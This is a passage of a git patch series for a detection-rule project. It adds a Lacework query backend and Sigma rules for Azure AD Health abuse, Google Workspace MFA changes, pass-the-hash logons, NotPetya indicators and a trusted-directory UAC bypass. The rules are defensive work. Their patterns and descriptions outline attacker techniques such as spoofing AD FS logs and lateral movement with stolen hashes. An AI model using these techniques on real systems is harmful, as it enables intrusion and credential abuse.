00000000..fb7dcece --- /dev/null +++ b/tools/sigma/backends/lacework.py @@ -0,0 +1,615 @@ +# Output backends for sigmac +# Copyright 2021 Lacework, Inc. +# Author: + +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU Lesser General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. + +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU Lesser General Public License for more details. + +# You should have received a copy of the GNU Lesser General Public License +# along with this program. If not, see . + +import json +import re +import textwrap +import yaml + +from sigma.backends.base import SingleTextQueryBackend +from sigma.backends.exceptions import BackendError +from sigma.parser.modifiers.base import SigmaTypeModifier + + +LACEWORK_CONFIG = yaml.load( + # TODO: build this out to support all the default aws sigma rules + textwrap.dedent(''' + --- + version: 0.1 + services: + cloudtrail: + evaluatorId: Cloudtrail + source: CloudTrailRawEvents + fieldMap: + - sigmaField: eventName + laceworkField: EVENT_NAME + matchType: exact + continue: false + - sigmaField: eventSource + laceworkField: EVENT_SOURCE + matchType: exact + continue: false + - sigmaField: errorCode + laceworkField: ERROR_CODE + matchType: exact + continue: false + - sigmaField: "^(.*)$" + laceworkField: EVENT:$1 + matchType: regex + continue: true + - sigmaField: "^(.*?)\\\\.type$" + laceworkField: '$1."type"' + matchType: regex + continue: true + returns: + - INSERT_ID + - INSERT_TIME + - EVENT_TIME + - EVENT + alertProfile: LW_CloudTrail_Alerts + '''), + Loader=yaml.SafeLoader +) + + +def safe_get(obj, name, inst): + """ + Sweet helper for getting objects + """ + try: + assert isinstance(obj[name], inst) + value = obj[name] + except Exception: + value = inst() + + return value + + +def get_output_format(config): + return ( + 'json' + if ( + safe_get(config, 'json', bool) + or safe_get(config, 'JSON', bool) + ) + else 'yaml' + ) + + +# YAML Tools +def str_presenter(dumper, data): + if len(data.splitlines()) > 1: # check for multiline string + return dumper.represent_scalar('tag:yaml.org,2002:str', data, style='|') + return dumper.represent_scalar('tag:yaml.org,2002:str', data) + + +yaml.add_representer(str, str_presenter) + + +class LaceworkBackend(SingleTextQueryBackend): + """ + Converts Sigma rule into Lacework Policy Platform + """ + identifier = "lacework" + active = True + # our approach to config will be such that we support both an + # embedded or specified config. + config_required = False + + andToken = ' and ' + orToken = ' or ' + notToken = 'not ' + subExpression = '(%s)' + listExpression = 'in (%s)' + listSeparator = ', ' + valueExpression = "'%s'" + nullExpression = '%s is null' + notNullExpression = '%s is not null' + mapExpression = '%s = %s' + mapListsSpecialHandling = True + mapListValueExpression = '%s %s' + + def generate(self, sigmaparser): + """ + Method is called for each sigma rule and receives the parsed rule (SigmaParser) + """ + # 1. get embedded config global + config = LACEWORK_CONFIG + + # 2. overlay backend options + config.update(self.backend_options) + + # 3. set a class instance variable for sigma fields + self.laceworkSigmaFields = LaceworkQuery.get_fields(sigmaparser) + + # 4. set a class instance variable for lacework field mapping + self.laceworkFieldMap = LaceworkQuery.get_field_map(LACEWORK_CONFIG, sigmaparser) + + # 5. get output format + output_format = get_output_format(config) + + # determine if we're generating query/policy/both + result = '' + if LaceworkQuery.should_generate_query(config): + query = LaceworkQuery( + config, sigmaparser, self, output_format=output_format) + result += str(query) + if LaceworkPolicy.should_generate_policy(config): + policy = LaceworkPolicy( + config, sigmaparser, output_format=output_format) + + # if we're in json mode and have already generated a query + # add a newline before emitting policy + if result and output_format == 'json': + result += '\n' + + result += str(policy) + + return result + + def generateValueNode(self, node): + """ + Value Expression for Lacework Query Language (LQL) + + If value is a field name + 1. Do not wrap in valueExpression + 2. Transfrom using fieldNameMapping() + """ + node = self.cleanValue(str(node)) + + if node in self.laceworkSigmaFields: + return self.fieldNameMapping(node, None) + return self.valueExpression % node + + def generateMapItemNode(self, node): + """ + Map Expression for Lacework Query Language (LQL) + + Special handling for contains by inspecting value for wildcards + """ + fieldname, value = node + + transformed_fieldname = self.fieldNameMapping(fieldname, value) + + # is not null + if value == '*': + return f'{transformed_fieldname} is not null' + # contains + if ( + isinstance(value, str) + and value.startswith('*') + and value.endswith('*') + ): + value = self.generateValueNode(value[1:-1]) + return f"contains({transformed_fieldname}, {value})" + # startswith + if ( + isinstance(value, str) + and value.endswith('*') # a wildcard at the end signifies startswith + ): + value = self.generateValueNode(value[:-1]) + return f"starts_with({transformed_fieldname}, {value})" + # endswith + if ( + isinstance(value, str) + and value.startswith('*') # a wildcard at the start signifies endswith + ): + new_value = self.generateValueNode(value[1:]) + if new_value != (self.valueExpression % value[1:]): + raise BackendError( + 'Lacework backend only supports endswith for literal string values') + return f"{transformed_fieldname} <> {new_value}" + if ( + self.mapListsSpecialHandling is False and isinstance(value, (str, int, list)) + or self.mapListsSpecialHandling is True and isinstance(value, (str, int)) + ): + return self.mapExpression % (transformed_fieldname, self.generateNode(value)) + elif type(value) == list: + return self.generateMapItemListNode(transformed_fieldname, value) + elif value is None: + return self.nullExpression % (transformed_fieldname, ) + else: + raise TypeError( + f'Lacework backend does not support map values of type {type(value)}') + + def fieldNameMapping(self, fieldname, value): + """ + Field Name Mapping for Lacework Query Language (LQL) + + The Lacework backend is not using a traditional config. + As such we map field names here using our custom backend config. + """ + if not (isinstance(fieldname, str) and fieldname): + return fieldname + + for map in self.laceworkFieldMap: + if not isinstance(map, dict): + continue + + sigma_field = safe_get(map, 'sigmaField', str) + if not sigma_field: + continue + + lacework_field = safe_get(map, 'laceworkField', str) + if not lacework_field: + continue + + continyu = safe_get(map, 'continue', bool) + + # exact + if ( + map.get('matchType') == 'exact' + and sigma_field == fieldname + ): + fieldname = lacework_field + if not continyu: + return fieldname + + # startswith + if ( + map.get('matchType') == 'startswith' + and fieldname.startswith(sigma_field) + ): + fieldname = f'{lacework_field}{fieldname[len(sigma_field):]}' + if not continyu: + return fieldname + + # regex + if map.get('matchType') == 'regex': + fieldname_re = re.compile(sigma_field) + fieldname_match = fieldname_re.match(fieldname) + + if not fieldname_match: + continue + + for i, group in enumerate(fieldname_match.groups(), start=1): + if group is None: + continue + fieldname = lacework_field.replace(f'${i}', group) + + if not continyu: + return fieldname + + return fieldname + + +class LaceworkQuery: + def __init__( + self, + config, + sigmaparser, + backend, + output_format='yaml' + ): + rule = sigmaparser.parsedyaml + conditions = sigmaparser.condparsed + + # 0. Get Output Format + self.output_format = str(output_format).lower() + + # 1. Get Service + self.service_name = self.get_service(rule) + + # 2. Get Service Config + self.service_config = self.get_service_config( + config, self.service_name) + + # 3. Get Evaluator ID + self.evaluator_id = self.get_evaluator_id( + self.service_name, self.service_config) + + # 4. Get Query ID + self.title, self.query_id = self.get_query_id(rule) + + # 5. Get Query Source + self.query_source = self.get_query_source( + self.service_name, self.service_config) + + # 6. Get Query Returns + self.returns = self.get_query_returns( + self.service_name, self.service_config) + + # 7. Get Query Text + self.query_text = self.get_query_text(backend, conditions) + + def get_query_text(self, backend, conditions): + query_template = ( + '{id} {{\n' + ' {source_block}\n' + ' {filter}\n' + ' {return_block}\n' + '}}' + ) + + # 1. get_query_source_block + source_block = self.get_query_source_block() + + # 2. get_query_filters + filter_block = self.get_query_filter_block(backend, conditions) + + # 3. get_query_returns + return_block = self.get_query_return_block() + + return query_template.format( + id=self.query_id, + source_block=source_block, + filter=filter_block, + return_block=return_block + ) + + def get_query_source_block(self): + source_block_template = ( + 'source {{\n' + ' {source}\n' + ' }}' + ) + return source_block_template.format( + source=self.query_source + ) + + def get_query_return_block(self): + return_block_template = ( + 'return distinct {{\n' + '{returns}\n' + ' }}' + ) + return return_block_template.format( + returns=',\n'.join(f' {r}' for r in self.returns) + ) + + def __iter__(self): + for key, attr in { + 'evaluatorId': 'evaluator_id', + 'queryId': 'query_id', + 'queryText': 'query_text' + }.items(): + yield (key, getattr(self, attr)) + + def __str__(self): + o = dict(self) + + if self.output_format == 'json': + return json.dumps(o, indent=4) + + return yaml.dump( + o, + explicit_start=True, + default_flow_style=False, + sort_keys=False + ) + + @staticmethod + def get_fields(sigmaparser): + return safe_get(sigmaparser.parsedyaml, 'fields', list) + + @staticmethod + def get_field_map(config, sigmaparser): + config = safe_get(config, 'services', dict) + service = LaceworkQuery.get_service(sigmaparser.parsedyaml) + service_config = safe_get(config, service, dict) + + return safe_get(service_config, 'fieldMap', list) + + @staticmethod + def should_generate_query(backend_options): + # if we are explictly requesting a query + if ( + 'query' in backend_options + and backend_options['query'] is True + ): + return True + # if we are explicitly requesting a policy + if ( + 'policy' in backend_options + and backend_options['policy'] is True + ): + return False + # we're not being explicit about anything + return True + + @staticmethod + def get_service(rule): + logsource = safe_get(rule, 'logsource', dict) + return logsource.get('service') or 'unknown' + + @staticmethod + def get_service_config(config, service): + config = safe_get(config, 'services', dict) + service_config = safe_get(config, service, dict) + + # 1. validate logsource service + if not service_config: + raise BackendError( + f'Service {service} is not supported by the Lacework backend') + + return service_config + + @staticmethod + def get_evaluator_id(service_name, service_config): + # 3. validate service has an evaluatorId mapping + evaluator_id = safe_get(service_config, 'evaluatorId', str) + + if not evaluator_id: + raise BackendError( + f'Lacework backend could not determine evaluatorId for service {service_name}') + + return evaluator_id + + @staticmethod + def get_query_id(rule): + title = safe_get(rule, 'title', str) or 'Unknown' + # TODO: might need to replace additional non-word characters + query_id = f'Sigma_{title}'.replace(" ", "_").replace("/", "_Or_") + + return title, query_id + + @staticmethod + def get_query_source(service_name, service_config): + # 4. validate service has a source mapping + source = safe_get(service_config, 'source', str) + + if not source: + raise BackendError( + f'Lacework backend could not determine source for service {service_name}') + + return source + + @staticmethod + def get_query_returns(service_name, service_config): + returns = safe_get(service_config, 'returns', list) + + if not returns: + raise BackendError( + f'Lacework backend could not determine returns for service {service_name}') + + return returns + + @staticmethod + def get_query_filter_block(backend, conditions): + filter_block_template = ( + 'filter {{\n' + ' {filter}\n' + ' }}' + ) + + for parsed in conditions: + query = backend.generateQuery(parsed) + before = backend.generateBefore(parsed) + after = backend.generateAfter(parsed) + + filter = "" + if before is not None: + filter = before + if query is not None: + filter += query + if after is not None: + filter += after + + return filter_block_template.format(filter=filter) + + +class LaceworkPolicy: + def __init__( + self, + config, + sigmaparser, + output_format='yaml' + ): + rule = sigmaparser.parsedyaml + + # 0. Get Output Format + self.output_format = str(output_format).lower() + + # 1. Get Service Name + self.service_name = LaceworkQuery.get_service(rule) + + # 2. Get Service Config + self.service_config = LaceworkQuery.get_service_config( + config, self.service_name) + + # 3. Get Evaluator Id + self.evaluator_id = LaceworkQuery.get_evaluator_id( + self.service_name, self.service_config) + + # 4. Get Title + # 5. Get Query ID + self.title, self.query_id = LaceworkQuery.get_query_id(rule) + + # 6. Get Enabled + self.enabled = False + + # 7. Get Policy Type + self.policy_type = 'Violation' + + # 8. Get Alert Enabled + self.alert_enabled = False + + # 9. Get Alert Profile + self.alert_profile = self.get_alert_profile( + self.service_name, self.service_config) + + # 10. Get Eval Frequency + self.eval_frequency = 'Hourly' + + # 11. Get Limit + self.limit = 1000 + + # 12. Get Severity + self.severity = safe_get(rule, 'level', str) or 'medium' + + # 13. Get Description + self.description = safe_get(rule, 'description', str) + + # 14. Get Remediation + self.remediation = "" + + def __iter__(self): + for key, attr in { + 'evaluatorId': 'evaluator_id', + 'title': 'title', + 'enabled': 'enabled', + 'policyType': 'policy_type', + 'alertEnabled': 'alert_enabled', + 'alertProfile': 'alert_profile', + 'evalFrequency': 'eval_frequency', + 'queryId': 'query_id', + 'limit': 'limit', + 'severity': 'severity', + 'description': 'description', + 'remediation': 'remediation' + }.items(): + yield (key, getattr(self, attr)) + + def __str__(self): + o = dict(self) + + if self.output_format == 'json': + return json.dumps(o, indent=4) + + return yaml.dump( + o, + explicit_start=True, + default_flow_style=False, + sort_keys=False + ) + + @staticmethod + def should_generate_policy(backend_options): + # if we are explictly requesting a query + if ( + 'policy' in backend_options + and backend_options['policy'] is True + ): + return True + # if we are explicitly requesting a policy + if ( + 'query' in backend_options + and backend_options['query'] is True + ): + return False + # we're not being explicit about anything + return True + + @staticmethod + def get_alert_profile(service_name, service_config): + alert_profile = safe_get(service_config, 'alertProfile', str) + + if not alert_profile: + raise BackendError( + f'Lacework backend could not determine alert profile for service {service_name}') + + return alert_profile From cc6e4381b2192ec5f355b3c1600a6dbb082d25a0 Mon Sep 17 00:00:00 2001 From: David Hazekamp Date: Thu, 26 Aug 2021 14:12:47 -0500 Subject: [PATCH 0604/1367] feat(backend): introducing lacework backend Adding authors Removing todo --- tools/sigma/backends/lacework.py | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/tools/sigma/backends/lacework.py b/tools/sigma/backends/lacework.py index fb7dcece..2f567088 100644 --- a/tools/sigma/backends/lacework.py +++ b/tools/sigma/backends/lacework.py @@ -1,6 +1,8 @@ # Output backends for sigmac # Copyright 2021 Lacework, Inc. -# Author: +# Authors: +# David Hazekamp (david.hazekamp@lacework.net) +# Rachel Rice (rachel.rice@lacework.net) # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Lesser General Public License as published by @@ -26,7 +28,6 @@ from sigma.parser.modifiers.base import SigmaTypeModifier LACEWORK_CONFIG = yaml.load( - # TODO: build this out to support all the default aws sigma rules textwrap.dedent(''' --- version: 0.1 From f98970ef0603a7e775fd501c9d53235bfe53fa92 Mon Sep 17 00:00:00 2001 From: Roberto Rodriguez Date: Thu, 26 Aug 2021 16:10:42 -0400 Subject: [PATCH 0605/1367] adding basic rules to detect behavior around AAD health agents and AAD Hybrid Health AD FS services in Azure --- .../azure_aadhybridhealth_adfs_new_server.yml | 26 +++++++++++++ ...re_aadhybridhealth_adfs_service_delete.yml | 26 +++++++++++++ .../win_aadhealth_mon_agent_regkey_access.yml | 35 ++++++++++++++++++ .../win_aadhealth_svc_agent_regkey_access.yml | 37 +++++++++++++++++++ 4 files changed, 124 insertions(+) create mode 100644 rules/cloud/azure/azure_aadhybridhealth_adfs_new_server.yml create mode 100644 rules/cloud/azure/azure_aadhybridhealth_adfs_service_delete.yml create mode 100644 rules/windows/builtin/win_aadhealth_mon_agent_regkey_access.yml create mode 100644 rules/windows/builtin/win_aadhealth_svc_agent_regkey_access.yml diff --git a/rules/cloud/azure/azure_aadhybridhealth_adfs_new_server.yml b/rules/cloud/azure/azure_aadhybridhealth_adfs_new_server.yml new file mode 100644 index 00000000..6a06f19b --- /dev/null +++ b/rules/cloud/azure/azure_aadhybridhealth_adfs_new_server.yml @@ -0,0 +1,26 @@ +title: Azure Active Directory Hybrid Health AD FS New Server +id: 288a39fc-4914-4831-9ada-270e9dc12cb4 +description: | + This detection uses AzureActivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service. + A threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. There is no need to compromise an on-prem AD FS server. + This can be done programmatically via HTTP requests to Azure. +status: experimental +date: 2021/08/26 +author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +tags: + - attack.defense_evasion + - attack.t1578 +references: + - https://o365blog.com/post/hybridhealthagent/ +logsource: + service: AzureActivity +detection: + selection: + CategoryValue: 'Administrative' + ResourceProviderValue: 'Microsoft.ADHybridHealthService' + ResourceId|contains: 'AdFederationService' + OperationNameValue: 'Microsoft.ADHybridHealthService/services/servicemembers/action' + condition: selection +falsepositives: + - legitimate AD FS servers added to an AAD Health AD FS service instance +level: medium \ No newline at end of file diff --git a/rules/cloud/azure/azure_aadhybridhealth_adfs_service_delete.yml b/rules/cloud/azure/azure_aadhybridhealth_adfs_service_delete.yml new file mode 100644 index 00000000..a4bd4e63 --- /dev/null +++ b/rules/cloud/azure/azure_aadhybridhealth_adfs_service_delete.yml @@ -0,0 +1,26 @@ +title: Azure Active Directory Hybrid Health AD FS Service Delete +id: 48739819-8230-4ee3-a8ea-e0289d1fb0ff +description: | + This detection uses AzureActivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid health AD FS service instance in a tenant. + A threat actor can create a new AD Health ADFS service and create a fake server to spoof AD FS signing logs. + The health AD FS service can then be deleted after it is not longer needed via HTTP requests to Azure. +status: experimental +date: 2021/08/26 +author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +tags: + - attack.defense_evasion + - attack.t1578.003 +references: + - https://o365blog.com/post/hybridhealthagent/ +logsource: + service: AzureActivity +detection: + selection: + CategoryValue: 'Administrative' + ResourceProviderValue: 'Microsoft.ADHybridHealthService' + ResourceId|contains: 'AdFederationService' + OperationNameValue: 'Microsoft.ADHybridHealthService/services/delete' + condition: selection +falsepositives: + - legitimate AAD Health AD FS service instances being deleted in a tenant +level: medium \ No newline at end of file diff --git a/rules/windows/builtin/win_aadhealth_mon_agent_regkey_access.yml b/rules/windows/builtin/win_aadhealth_mon_agent_regkey_access.yml new file mode 100644 index 00000000..7636940d --- /dev/null +++ b/rules/windows/builtin/win_aadhealth_mon_agent_regkey_access.yml @@ -0,0 +1,35 @@ +title: Azure AD Health Monitoring Agent Registry Keys Access +id: ff151c33-45fa-475d-af4f-c2f93571f4fe +description: | + This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent. + This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\SOFTWARE\Microsoft\Microsoft Online\Reporting\MonitoringAgent. +status: experimental +date: 2021/08/26 +author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +tags: + - attack.discovery + - attack.t1012 +references: + - https://o365blog.com/post/hybridhealthagent/ + - https://github.com/OTRF/Set-AuditRule/blob/master/rules/registry/aad_connect_health_monitoring_agent.yml +logsource: + product: windows + service: security +detection: + selection: + EventID: + - 4656 + - 4663 + ObjectType: 'Key' + ObjectName: '\REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Online\Reporting\MonitoringAgent' + filter: + ProcessName|contains: + - 'Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe' + - 'Microsoft.Identity.Health.Adfs.InsightsService.exe' + - 'Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe' + - 'Microsoft.Identity.Health.Adfs.PshSurrogate.exe' + - 'Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe' + condition: selection and not filter +falsepositives: + - Unknown +level: medium diff --git a/rules/windows/builtin/win_aadhealth_svc_agent_regkey_access.yml b/rules/windows/builtin/win_aadhealth_svc_agent_regkey_access.yml new file mode 100644 index 00000000..fa30f12d --- /dev/null +++ b/rules/windows/builtin/win_aadhealth_svc_agent_regkey_access.yml @@ -0,0 +1,37 @@ +title: Azure AD Health Service Agents Registry Keys Access +id: 1d2ab8ac-1a01-423b-9c39-001510eae8e8 +description: | + This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS). + Information from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation). + This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\SOFTWARE\Microsoft\ADHealthAgent. + Make sure you set the SACL to propagate to its sub-keys. +status: experimental +date: 2021/08/26 +author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +tags: + - attack.discovery + - attack.t1012 +references: + - https://o365blog.com/post/hybridhealthagent/ + - https://github.com/OTRF/Set-AuditRule/blob/master/rules/registry/aad_connect_health_service_agent.yml +logsource: + product: windows + service: security +detection: + selection: + EventID: + - 4656 + - 4663 + ObjectType: 'Key' + ObjectName: '\REGISTRY\MACHINE\SOFTWARE\Microsoft\ADHealthAgent' + filter: + ProcessName|contains: + - 'Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe' + - 'Microsoft.Identity.Health.Adfs.InsightsService.exe' + - 'Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe' + - 'Microsoft.Identity.Health.Adfs.PshSurrogate.exe' + - 'Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe' + condition: selection and not filter +falsepositives: + - Unknown +level: medium From 1fffb7a3f51f920983d22e6f3a19ecf1fb28c40e Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 26 Aug 2021 20:28:35 -0500 Subject: [PATCH 0606/1367] Gworkspace MFA disabled. --- .../gworkspace/gworkspace_mfa_disabled.yml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 rules/cloud/gworkspace/gworkspace_mfa_disabled.yml diff --git a/rules/cloud/gworkspace/gworkspace_mfa_disabled.yml b/rules/cloud/gworkspace/gworkspace_mfa_disabled.yml new file mode 100644 index 00000000..3730e5c1 --- /dev/null +++ b/rules/cloud/gworkspace/gworkspace_mfa_disabled.yml @@ -0,0 +1,27 @@ +title: Google Workspace MFA Disabled +id: 780601d1-6376-4f2a-884e-b8d45599f78c +description: Detects when multi-factor authentication (MFA) is disabled. +author: Austin Songer +status: experimental +date: 2021/08/26 +references: + - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings?hl=en#ALLOW_STRONG_AUTHENTICATION +logsource: + service: google_workspace.admin +detection: + selection: + eventService: admin.googleapis.com + eventName: + - ENFORCE_STRONG_AUTHENTICATION + - ALLOW_STRONG_AUTHENTICATION + eventValue: + new_value: false + condition: all of them +level: medium +tags: + - attack.impact +falsepositives: + - MFA may be disabled and performed by a system administrator. + \ No newline at end of file From 55f5ff3d89cc10cc2221be91fa291bb32c1c4095 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 26 Aug 2021 20:55:07 -0500 Subject: [PATCH 0607/1367] Application Removed --- .../gworkspace_application_remove.yml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 rules/cloud/gworkspace/gworkspace_application_remove.yml diff --git a/rules/cloud/gworkspace/gworkspace_application_remove.yml b/rules/cloud/gworkspace/gworkspace_application_remove.yml new file mode 100644 index 00000000..90e05d4d --- /dev/null +++ b/rules/cloud/gworkspace/gworkspace_application_remove.yml @@ -0,0 +1,25 @@ +title: Google Workspace Application Removed +id: ee2803f0-71c8-4831-b48b-a1fc57601ee4 +description: Detects when an an application is removed from Google Workspace. +author: Austin Songer +status: experimental +date: 2021/08/26 +references: + - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION_FROM_WHITELIST +logsource: + service: google_workspace.admin +detection: + selection: + eventService: admin.googleapis.com + eventName: + - REMOVE_APPLICATION + - REMOVE_APPLICATION_FROM_WHITELIST + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Application being removed may be performed by a System Administrator. + \ No newline at end of file From bc246ff59da2d587fa501ea2176960d3200858bc Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 26 Aug 2021 20:58:22 -0500 Subject: [PATCH 0608/1367] Rename gworkspace_application_remove.yml to gworkspace_application_remove.dyml --- ...pplication_remove.yml => gworkspace_application_remove.dyml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename rules/cloud/gworkspace/{gworkspace_application_remove.yml => gworkspace_application_remove.dyml} (99%) diff --git a/rules/cloud/gworkspace/gworkspace_application_remove.yml b/rules/cloud/gworkspace/gworkspace_application_remove.dyml similarity index 99% rename from rules/cloud/gworkspace/gworkspace_application_remove.yml rename to rules/cloud/gworkspace/gworkspace_application_remove.dyml index 90e05d4d..78580618 100644 --- a/rules/cloud/gworkspace/gworkspace_application_remove.yml +++ b/rules/cloud/gworkspace/gworkspace_application_remove.dyml @@ -22,4 +22,4 @@ tags: - attack.impact falsepositives: - Application being removed may be performed by a System Administrator. - \ No newline at end of file + From 62cefcc0281395db5b2cb02db78082732fa75a7e Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 26 Aug 2021 21:15:56 -0500 Subject: [PATCH 0609/1367] Rename gworkspace_application_remove.dyml to gworkspace_application_removed.yml --- ...application_remove.dyml => gworkspace_application_removed.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/cloud/gworkspace/{gworkspace_application_remove.dyml => gworkspace_application_removed.yml} (100%) diff --git a/rules/cloud/gworkspace/gworkspace_application_remove.dyml b/rules/cloud/gworkspace/gworkspace_application_removed.yml similarity index 100% rename from rules/cloud/gworkspace/gworkspace_application_remove.dyml rename to rules/cloud/gworkspace/gworkspace_application_removed.yml From 72485a5619c49d74cfb8ea4eac50661becb0a38a Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 26 Aug 2021 21:16:21 -0500 Subject: [PATCH 0610/1367] Update gworkspace_application_removed.yml --- rules/cloud/gworkspace/gworkspace_application_removed.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/rules/cloud/gworkspace/gworkspace_application_removed.yml b/rules/cloud/gworkspace/gworkspace_application_removed.yml index 78580618..7ed76524 100644 --- a/rules/cloud/gworkspace/gworkspace_application_removed.yml +++ b/rules/cloud/gworkspace/gworkspace_application_removed.yml @@ -22,4 +22,3 @@ tags: - attack.impact falsepositives: - Application being removed may be performed by a System Administrator. - From 8bdd3e3987365064210ff8ec8c4fe392f41b3483 Mon Sep 17 00:00:00 2001 From: Evan Yu Date: Fri, 27 Aug 2021 11:26:40 -0400 Subject: [PATCH 0611/1367] Simplify Pass the Pash rule --- rules/windows/builtin/win_pass_the_hash.yml | 17 +++++++---------- 1 file changed, 7 insertions(+), 10 deletions(-) diff --git a/rules/windows/builtin/win_pass_the_hash.yml b/rules/windows/builtin/win_pass_the_hash.yml index 805d9137..42af2c80 100644 --- a/rules/windows/builtin/win_pass_the_hash.yml +++ b/rules/windows/builtin/win_pass_the_hash.yml @@ -17,16 +17,13 @@ logsource: definition: The successful use of PtH for lateral movement between workstations would trigger event ID 4624, a failed logon attempt would trigger an event ID 4625 detection: selection: - - EventID: 4624 - LogonType: '3' - LogonProcessName: 'NtLmSsp' - WorkstationName: '%Workstations%' - ComputerName: '%Workstations%' - - EventID: 4625 - LogonType: '3' - LogonProcessName: 'NtLmSsp' - WorkstationName: '%Workstations%' - ComputerName: '%Workstations%' + EventID: + - 4624 + - 4625 + LogonType: '3' + LogonProcessName: 'NtLmSsp' + WorkstationName: '%Workstations%' + ComputerName: '%Workstations%' filter: AccountName: 'ANONYMOUS LOGON' condition: selection and not filter From 178d82e9cd85e617239d539c928031635c869d66 Mon Sep 17 00:00:00 2001 From: Evan Yu Date: Fri, 27 Aug 2021 11:53:50 -0400 Subject: [PATCH 0612/1367] Fix NotPetya Ransomware rule --- rules/windows/process_creation/win_malware_notpetya.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_malware_notpetya.yml b/rules/windows/process_creation/win_malware_notpetya.yml index 4f0d44bf..6ef6b416 100644 --- a/rules/windows/process_creation/win_malware_notpetya.yml +++ b/rules/windows/process_creation/win_malware_notpetya.yml @@ -30,7 +30,7 @@ detection: rundll32_dash1: Image|endswith: '\rundll32.exe' CommandLine|endswith: '.dat,#1' - perfc_keyword|contains: + perfc_keyword: - '\perfc.dat' condition: 1 of them fields: From f78225c394af8c597b1f237e5173c2898c7a3f16 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 27 Aug 2021 18:12:21 +0200 Subject: [PATCH 0613/1367] rule: UAC bypass by mocking dirs --- .../win_susp_uac_bypass_trustedpath.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/windows/process_creation/win_susp_uac_bypass_trustedpath.yml diff --git a/rules/windows/process_creation/win_susp_uac_bypass_trustedpath.yml b/rules/windows/process_creation/win_susp_uac_bypass_trustedpath.yml new file mode 100644 index 00000000..1859e846 --- /dev/null +++ b/rules/windows/process_creation/win_susp_uac_bypass_trustedpath.yml @@ -0,0 +1,23 @@ +title: TrustedPath UAC Bypass Pattern +id: 4ac47ed3-44c2-4b1f-9d51-bf46e8914126 +status: experimental +description: Detects indicators of a UAC bypass method by mocking directories +references: + - https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e + - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows + - https://github.com/netero1010/TrustedPath-UACBypass-BOF +author: Florian Roth +date: 2021/08/27 +tags: + - attack.defense_evasion + - attack.t1548.002 +logsource: + category: process_creation + product: windows +detection: + selection: + Image|contains: 'C:\Windows \System32\' + condition: selection +falsepositives: + - Unknown +level: critical From ef6e0c5a4c6865af6238d210811c24902b4a85ee Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 28 Aug 2021 08:02:16 +0200 Subject: [PATCH 0614/1367] Fix error and FP --- .../powershell/powershell_alternate_powershell_hosts.yml | 4 ++-- .../powershell_delete_volume_shadow_copies.yml | 9 ++++----- 2 files changed, 6 insertions(+), 7 deletions(-) diff --git a/rules/windows/powershell/powershell_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_alternate_powershell_hosts.yml index 582da352..5078913e 100644 --- a/rules/windows/powershell/powershell_alternate_powershell_hosts.yml +++ b/rules/windows/powershell/powershell_alternate_powershell_hosts.yml @@ -4,7 +4,7 @@ id: 64e8e417-c19a-475a-8d19-98ea705394cc description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe status: test date: 2019/08/11 -modified: 2021/08/18 +modified: 2021/08/28 author: Roberto Rodriguez @Cyb3rWard0g references: - https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html @@ -39,5 +39,5 @@ detection: EventID: 400 HostApplication: '*' filter: - HostApplication|endswith: 'powershell.exe' + HostApplication|startswith: 